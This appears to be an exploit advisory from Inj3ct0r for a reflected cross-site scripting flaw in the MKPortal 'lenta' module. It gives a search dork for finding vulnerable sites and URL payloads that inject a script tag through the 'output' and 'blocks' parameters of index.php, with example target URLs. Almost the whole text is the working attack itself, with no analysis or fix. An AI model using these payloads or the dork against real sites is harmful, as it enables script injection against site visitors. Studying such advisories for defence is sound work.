=======================================
MKPortal lenta module XSS Vulnerability
=======================================
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
##################################################
Vulnerable products: MKPortal module lenta Exploit
Dork: "inurl:index.php?ind=" graber lenta
##################################################
1. Multiple pXSS
Vulnerability in the file index.php.
Exploit:
/index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3E
Example:
http://www.xxxxxxxxxxxxxxxu/index.php?ind=lentanews&output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxu/index.php?ind=lentanews&blocks=%3Cscript%3Ealert(1)%3C/script%3E
